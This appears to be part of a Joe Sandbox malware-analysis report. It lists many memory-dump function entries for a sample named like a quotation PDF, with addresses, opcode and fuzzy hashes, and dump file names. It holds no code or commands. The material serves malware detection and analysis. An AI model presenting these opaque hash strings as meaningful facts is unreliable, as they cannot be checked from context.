Opcode ID: 2d5f1a289273701f6519e9e6c83844e9d73f73b7212a7c8320f10b2be7cec216
Instruction ID: 798a58ed738bca6c40d79a7be51362de6ced146343dac4ded86b6ce9ba5af601
Opcode Fuzzy Hash: 2d5f1a289273701f6519e9e6c83844e9d73f73b7212a7c8320f10b2be7cec216
Instruction Fuzzy Hash: DE313861A1D6CA0FEB51BB38541A6F67FE0EF56340F0401BBC089C7583C968980A83A1

Function 00007FF84900332F Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16836e3166dab1893b4086f8d9ac82f41064fcc9ecdd4ae9cafb6788ed04235
Instruction ID: ae8783f4a5298c82bea5207b511bdfc0caa732befdc548202fa9ee877fc3c5ea
Opcode Fuzzy Hash: d16836e3166dab1893b4086f8d9ac82f41064fcc9ecdd4ae9cafb6788ed04235
Instruction Fuzzy Hash: 72314F70D1859A8FEFA5EF6894866A977B1FF54740F504079C009E3292DE38A8469B80

Function 00007FF848E60790 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57718e4ce3d5856a36b97fa05f87a99539e4223a2875b08dc01005f13f2586c
Instruction ID: 768f7040a51f0c9c9463a51025f86d8b7ed451ad887800cdb0ba3d27db8596d6
Opcode Fuzzy Hash: e57718e4ce3d5856a36b97fa05f87a99539e4223a2875b08dc01005f13f2586c
Instruction Fuzzy Hash: 58210353C4F6D11FE35AB2B838550F53FA0FF12264F1C40B7D0CCAA0E79A25A945C2AA

Function 00007FF8490827F9 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286493a7f1bd533dab4fd4691f2856585ed2f6e33db5916f828a45ea7833f702
Instruction ID: fe34daba6ee9d797979845644ee91dff56bc4924168020d09a07f22c534fde89
Opcode Fuzzy Hash: 286493a7f1bd533dab4fd4691f2856585ed2f6e33db5916f828a45ea7833f702
Instruction Fuzzy Hash: F231E431A0D6C89FDB99EF6884551A97BF1FF49314F1500BED049C7282CB35E842CB40

Function 00007FF848E61752 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9c5bca2157f007e507ba3f6e2749f8a1621988c17b8e02b0759a98d082b154a
Instruction ID: 52cb70480215f0b03464d558a5d3019aba8c0f661ec36b8a7d0fba2a5b4ac67a
Opcode Fuzzy Hash: b9c5bca2157f007e507ba3f6e2749f8a1621988c17b8e02b0759a98d082b154a
Instruction Fuzzy Hash: 4531C171D0D94D8FDB95FBACD4559EDBBE1FF99350B8001B9E049EB1B2CA3868418704

Function 00007FF84908BA65 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ae408e9fd96d149942be4cabf091ca631bc3e94738cac694e753addc1df61c
Instruction ID: 1e104edbced1bb2e6882ccf86d6ce2510b8d0bbe81cf77466dce793dac523181
Opcode Fuzzy Hash: 86ae408e9fd96d149942be4cabf091ca631bc3e94738cac694e753addc1df61c
Instruction Fuzzy Hash: 0C317A3461CA8E8FDF98FF28C4946AA7BE1FF59300F1005AAE419CB286DB75E801C740

Function 00007FF848E60AB5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a0e55120c3dd55a12c5e99f41507a795f3f6c7d2966cf3057c7abb48d950ce
Instruction ID: c66cde42a0598f06e3017ec7ee1acfb9794577d2807781c67215895403f9a08a
Opcode Fuzzy Hash: 01a0e55120c3dd55a12c5e99f41507a795f3f6c7d2966cf3057c7abb48d950ce
Instruction Fuzzy Hash: 1E312B70E08A4D8FDB98EB68C0556ADBBE1FF58351F5440AEE049E76A2CB35A8418B41

Function 00007FF848E607D3 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2752413b782732fd878d67415b96927110a0affe452707fadba99a4ec71e3838
Instruction ID: ac746f3b004b2a75341d550d2cf6b0f762a558359a1967e470237eafbf951e29
Opcode Fuzzy Hash: 2752413b782732fd878d67415b96927110a0affe452707fadba99a4ec71e3838
Instruction Fuzzy Hash: BA21D753C0F6D10FE35AB67928191746FE0FF52664F1C44FBD0CC6A0E79A25A948C396

Function 00007FF848E60730 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31dc1d9f343112f101172a471ed7226c13f7e7b6931dfe35321bacbafe6ff201
Instruction ID: d266a411fff8efdd740d8f50756313d25c871d3d06df7053611d2640b1a89da6
Opcode Fuzzy Hash: 31dc1d9f343112f101172a471ed7226c13f7e7b6931dfe35321bacbafe6ff201
Instruction Fuzzy Hash: 1F21C522E0C6160EF779B11868052B576C1EB957B1F54053FD88FD1187EF7978424288

Function 00007FF849089B50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d46db2ef0d7340df565151f966c6fecb651611c57572ee493dedfb98d8ebdb
Instruction ID: 9a89e43eab6cfd56ce52d3f31583dd05ba7743533d8fbe8a6599b8ebf3cac6a8
Opcode Fuzzy Hash: 75d46db2ef0d7340df565151f966c6fecb651611c57572ee493dedfb98d8ebdb
Instruction Fuzzy Hash: F6218E30B0CA498FDBE8FF2C9494A25B7D2FF98340B5005BDA04EC32A6DE24EC418781

Function 00007FF8490928C1 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7613a12913a0b3d5df1d209675dc86f7ec60b09f9a1928b85902871481abbd8b
Instruction ID: 28eb731312fe7534c31688fd4729110367957181899a73df6102e1cb1c8deccd
Opcode Fuzzy Hash: 7613a12913a0b3d5df1d209675dc86f7ec60b09f9a1928b85902871481abbd8b
Instruction Fuzzy Hash: C9213331B0EE895FEBA9FB3CA4556A477E0EF5935070401BAC009C72A3D91DEC42C380

Function 00007FF849003C0B Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7091a18237846aa80d9ae486276a4fcacbf8de3b7783765b2d4ee9000d42c9d1
Instruction ID: f0c089552dff8188dfca67f356beb2d8061db064abd34b8fcee4ff2a22e6b5d1
Opcode Fuzzy Hash: 7091a18237846aa80d9ae486276a4fcacbf8de3b7783765b2d4ee9000d42c9d1
Instruction Fuzzy Hash: 01319330A1891D8FDFA4EF68D4556ADB7B1FF58341F500179D00DE7292DA35AC52CB44

Function 00007FF848E6827C Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b3700e0840f3c683d006338998b1237e9306747d3511ddf590fbd1efb644f4
Instruction ID: de442f3e2a62e53942dedbf6cb05c4e1d98c681a895757d7c91e52496a027468
Opcode Fuzzy Hash: f1b3700e0840f3c683d006338998b1237e9306747d3511ddf590fbd1efb644f4
Instruction Fuzzy Hash: F0218E3070CD2A4FD698FA2CA4556B8B3D2FF98710B4002BEE44EC3297DE25AC428785

Function 00007FF849082550 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c171a5f33f22d60e8ea51d0accad7de6c4a80066a98edcc1044bb154fb92dd
Instruction ID: f1946fcaacf75c729514f571ad6abac2e604690263c1a16e542fecd557c3474d
Opcode Fuzzy Hash: 37c171a5f33f22d60e8ea51d0accad7de6c4a80066a98edcc1044bb154fb92dd
Instruction Fuzzy Hash: 1821D131F0CA494FE76CEA2DA4556BA76D5FF883A0F00017EE44EC3282DE24EC0282D5

Function 00007FF848E60CFC Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042897dfab01457eb4118e348e0d9f57f84dd8c3fc8c00e11f319401a954cdf1
Instruction ID: 0926aaebe17744c387dc228fb3c4c121e4ecbf8d153fcdeaca4d97acaf6b2f6d
Opcode Fuzzy Hash: 042897dfab01457eb4118e348e0d9f57f84dd8c3fc8c00e11f319401a954cdf1
Instruction Fuzzy Hash: 8D21D134908A8E8FEB45EF24C8456EBBBB1FF99300F04416AD409E7295DB34A951CB81

Function 00007FF848E6ABFD Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107461d0eada27290675158ac61675551ed0e60dc5cd024174a1a7e119331486
Instruction ID: 67d6f7d291d20f496787c5706b30295880b4a6a502d26f3b38d57f07618a00ab
Opcode Fuzzy Hash: 107461d0eada27290675158ac61675551ed0e60dc5cd024174a1a7e119331486
Instruction Fuzzy Hash: FC215930C1890EAFEB44FF68D8096EEB7B0FF18385F800576E80DC2191DB34A6A48B55

Function 00007FF849086AB0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82d181b554c6068dd6e9e371f5d64f6d983f34567841f0c69bee54c0f99c6e1
Instruction ID: 51f78c9b462c12671c446c895b255acd02ceffe664a899da9bfa859f3ff37dd3
Opcode Fuzzy Hash: a82d181b554c6068dd6e9e371f5d64f6d983f34567841f0c69bee54c0f99c6e1
Instruction Fuzzy Hash: 47115932F0DD4A6FE6BCFA1C684657577C6EB957A070705B9D00DC3286DD14FC424290

Function 00007FF848E60D29 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3037c88fcb4ff6c8f56d50c74061f5edf5fa5445e7b0101c45408a18949a5a
Instruction ID: 0c60920de1176f029f209421ba24c2dc4bd39ae092aac0e2bffab4cef56c9b11
Opcode Fuzzy Hash: fe3037c88fcb4ff6c8f56d50c74061f5edf5fa5445e7b0101c45408a18949a5a
Instruction Fuzzy Hash: 8821F53090C68E8FEB85EF24C8556EB7BF1FF99300F1441AAD449D7296C738A942C781

Function 00007FF848E63024 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580e64a1647dcbeb63101fbc2eaa161be95c7ac3ccb16bdb578266ddc6c1bfb3
Instruction ID: ada62c0cfdc3d9b3b7d43f7bf56a206c52cde7fcbd345e2dde389ee0a9e31455
Opcode Fuzzy Hash: 580e64a1647dcbeb63101fbc2eaa161be95c7ac3ccb16bdb578266ddc6c1bfb3
Instruction Fuzzy Hash: E421E430A0C50A8FEBA4FB58C8606B573D0FF65350F94067AD00AD71D6DF38B546874A

Function 00007FF848E60C51 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7039950472a0655adee41165483634b217a6f9ef376b09572fc7910ff8ef0997
Instruction ID: 0a4f943421059f4d72b14e1de0ffaa1cb94fdd5e9e79c8264f6345006cfa0dd1
Opcode Fuzzy Hash: 7039950472a0655adee41165483634b217a6f9ef376b09572fc7910ff8ef0997
Instruction Fuzzy Hash: FD21CF22D0D9AA5FF7A4B62888112BA76D0FF45390F8406B6D44DF70C3EF38791A4686

Function 00007FF849003B9C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb9774c63f911bcf4dc057d7671a95430068008ad635deb3e636d7fbe320444
Instruction ID: 55b43785542fd941dfbe6c98f7bb2019e948362688ffeaeaa384aac81e9b05b0
Opcode Fuzzy Hash: ecb9774c63f911bcf4dc057d7671a95430068008ad635deb3e636d7fbe320444
Instruction Fuzzy Hash: B821F630D085598FDF64EF94D455AFDB7B1FF58380F500079D009A7292DA35AD86CB90

Function 00007FF8490932D9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5811070ee8a9ae9f840bfe7d02a19be57905eb778305d840baf89ee9e061bee6
Instruction ID: f0a54c9f21cb085599ddd8c128bc2051353436477888afb24df9fa014cbca822
Opcode Fuzzy Hash: 5811070ee8a9ae9f840bfe7d02a19be57905eb778305d840baf89ee9e061bee6
Instruction Fuzzy Hash: EB01497250E7885FE72A9528AC0B1F27BE4DB53231B04017FE08DC3162E811AC4782E2

Function 00007FF849082EAE Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b687fea0e290ac2edce012038707517a1ba43dfddca0eab01d17ab52fc4c88a
Instruction ID: cc2bc442275c118de2423d7e7002302f321c49b6cb19378a9028e63336e13d71
Opcode Fuzzy Hash: 1b687fea0e290ac2edce012038707517a1ba43dfddca0eab01d17ab52fc4c88a
Instruction Fuzzy Hash: 1C118F31B2CB868FDFA8FE5C94915B9B3E0FB58794F05143ED44BD3282CE24E8018A85

Function 00007FF84908E770 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec070b8ba474bc4e622ff4e1589412572a7b10cf81a409df49c5d4635e00c709
Instruction ID: 8c7743b1b05a65c7941b05a81d13e816bf42cefcbe1e020f8fb12a0d395e0023
Opcode Fuzzy Hash: ec070b8ba474bc4e622ff4e1589412572a7b10cf81a409df49c5d4635e00c709
Instruction Fuzzy Hash: D611D37190EBCD9FEF65FE3898096AA3BE0EF56340F0505BAD448C7192D5649409C3D2

Function 00007FF848E62735 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ea1782f1a6ccbcbd6a33af882ba5788e3ff1fc018fa210e9c8e8c4e34712e0
Instruction ID: 69b9236ee9012d12f6da50a980162c0eaf16a41abc5bf719aab93788c7da62f8
Opcode Fuzzy Hash: a7ea1782f1a6ccbcbd6a33af882ba5788e3ff1fc018fa210e9c8e8c4e34712e0
Instruction Fuzzy Hash: 0F11E630A0CA894FD785DB3C5454279BBE2EF99261F4845BFD04DC72A3CE38D8458704

Function 00007FF849080566 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9717035d763ceb451e67bd47958007de975232435d151ad4a5690c0e66ccb1fd
Instruction ID: 5e778a4e87c65a7caccd4a44840d68d2fb41c9c0d6adad9e2c08a27fed0089e4
Opcode Fuzzy Hash: 9717035d763ceb451e67bd47958007de975232435d151ad4a5690c0e66ccb1fd
Instruction Fuzzy Hash: BB112361A2C68A0FEB50BB78401A6FA7BE2FF59340F5044BAC48AC35C3CD6CA4479391

Function 00007FF8490838A0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b024c77a55e42f1566df47d77aa83cf061e1147ad09c9e58fa270bb6c7580216
Instruction ID: 695a28dfb758754276480b2a0325299203fe0ba862fc806cd184b804d3bbf3e6
Opcode Fuzzy Hash: b024c77a55e42f1566df47d77aa83cf061e1147ad09c9e58fa270bb6c7580216
Instruction Fuzzy Hash: D001C021B1A90D8FDAA0EE2C9848B6573D2EB8C760B1542B6944DC7359DD24EC4383C0

Function 00007FF849083640 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c1444850d7d4b5d6a6b1c6f533737384bebdb822c3bdfe20fe0922813f7d10
Instruction ID: 5ff014ce5c5d1d0edbaf023b464ab382d43294752a9ce66082c7090958f7348e
Opcode Fuzzy Hash: 24c1444850d7d4b5d6a6b1c6f533737384bebdb822c3bdfe20fe0922813f7d10
Instruction Fuzzy Hash: AB115C70B1C9594FEB98FA1C904CBB17BD1DBD4790F084679E84CC32B4D925D8C58741

Function 00007FF84908D790 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 239a2d11fe05db7c52ca3da93095e1da1805eb68da653deb2da5db007c0e73ae
Instruction ID: 7d13041209e12c21794d35eb02e4ee37eaf70f44504c138289a4cfad86be9b27
Opcode Fuzzy Hash: 239a2d11fe05db7c52ca3da93095e1da1805eb68da653deb2da5db007c0e73ae
Instruction Fuzzy Hash: 76012621B2DE491FDB68FA189045AFBB3D1EBA8354F04067EE04FC3196DE69F8458385

Function 00007FF848E6B2FA Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9349ec89f93697381d0c9c43b7bdb0b7c8148297e0025e543761624a9f07b6
Instruction ID: 55025e6d123f60451febe6a2733106a3b0fd224f6bc90521af5894a27f7d308c
Opcode Fuzzy Hash: 0b9349ec89f93697381d0c9c43b7bdb0b7c8148297e0025e543761624a9f07b6
Instruction Fuzzy Hash: 2F113130A0C68E8FDB45EB6894146FE7BF0EF9A341F4400BED409E7291CB38A801C384

Function 00007FF849003564 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc06d1320cade42dd50895d768bfcef36127f5cb7206668b5258fb56ec3f7294
Instruction ID: 1b4e47da153754420351daf0f10cdb0dcb78c42872e659f16dd88e9e158ab03c
Opcode Fuzzy Hash: cc06d1320cade42dd50895d768bfcef36127f5cb7206668b5258fb56ec3f7294
Instruction Fuzzy Hash: 5C21ED70E1899A8FEFA5EF5894457BA77F1FF58340F5040B5D00CE3291DA38A9858B90

Function 00007FF849003650 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb64ad0c26ef788e0dfae4b2935c468ccf08ef46eed82a453cca5e0ed09e39de
Instruction ID: c4e68c998e278574fe2544b2afb03f3c3185f3cf01e998e375aedb69e604613e
Opcode Fuzzy Hash: cb64ad0c26ef788e0dfae4b2935c468ccf08ef46eed82a453cca5e0ed09e39de
Instruction Fuzzy Hash: F011FE70E1899A8FEFA5EF589445BF977B1FF58740F5080B5C00CE3285DE38A9858B90

Function 00007FF849003392 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1143554960ea95a69a9e1643075e45e0c216fbbcfaee293c5d62304422924c4e
Instruction ID: f702855c0f44e1190c6651ab144f3f26ee55357a9d9bcd914b4a3af8ffb6b4e0
Opcode Fuzzy Hash: 1143554960ea95a69a9e1643075e45e0c216fbbcfaee293c5d62304422924c4e
Instruction Fuzzy Hash: 0511FEB0E1859A8FEFA5EF5894467B977B1FF58740F5040B9C00DE3281DE38A9858B90

Function 00007FF8490032C2 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c906a694a2b6e1950bf919266e84026f6f55948732d275d85e9926d62a8391
Instruction ID: a41baf7932d8f474b2ebe881f3782d28089838ff4c1ab219cf742473749b0deb
Opcode Fuzzy Hash: b0c906a694a2b6e1950bf919266e84026f6f55948732d275d85e9926d62a8391
Instruction Fuzzy Hash: C7116DB0E1858A8FEFA5EF5884467B977F1FF58340F5040B5C00CE3281DA38A9858B90

Function 00007FF84909C4C5 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7158a26f64fef1aae90ac2397d3438ef35596f1e51ffbe6a569dead27d0d60e
Instruction ID: ac29c55c64c62c541cef7093d19bd915d3fc3f8597ccf21a420b3e91617290e9
Opcode Fuzzy Hash: c7158a26f64fef1aae90ac2397d3438ef35596f1e51ffbe6a569dead27d0d60e
Instruction Fuzzy Hash: 75114571D0898D9FEB95EF68C859AA8BBA0FF58344F0401AAD40DCB192DA34A984CB01

Function 00007FF849003478 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2635799419.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
